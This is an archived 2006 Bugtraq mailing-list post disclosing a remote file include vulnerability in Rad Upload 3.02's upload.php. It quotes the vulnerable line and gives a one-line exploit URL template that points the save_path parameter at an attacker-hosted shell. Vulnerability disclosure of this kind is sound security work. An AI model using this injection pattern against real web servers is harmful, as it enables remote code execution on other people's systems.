Web Apps- Rad Upload Version 3.02 Remote File Include Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Web Apps- Rad Upload Version 3.02 Remote File Include Vulnerability
From: rko.thelegendkiller@xxxxxxxxx
Date: 12 Dec 2006 16:47:33 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

*^* Rad Upload Version 3.02 Remote File Include Vulnerability

*^* Source: http://www.radinks.com/downloads/raduploadlite.zip

*^* Vulnerable C0de On Line 39 In upload.php
    :
        if(isset($save_path) && $save_path!="")

*^* (EXploit) http://[victim]/[directory]/upload.php?save_path=[sh3ll]?

*^* Found3d By: Arham

*^* Gr33tz To -- Str0ke,Usman And Secure-Pak Team

Prev by Date: [SBDA] SiteKiosk - FileSystem Access
Next by Date: rPSA-2006-0230-1 evince
Previous by thread: [SBDA] SiteKiosk - FileSystem Access
Next by thread: Re: Web Apps- Rad Upload Version 3.02 Remote File Include Vulnerability
Index(es):
- Date
- Thread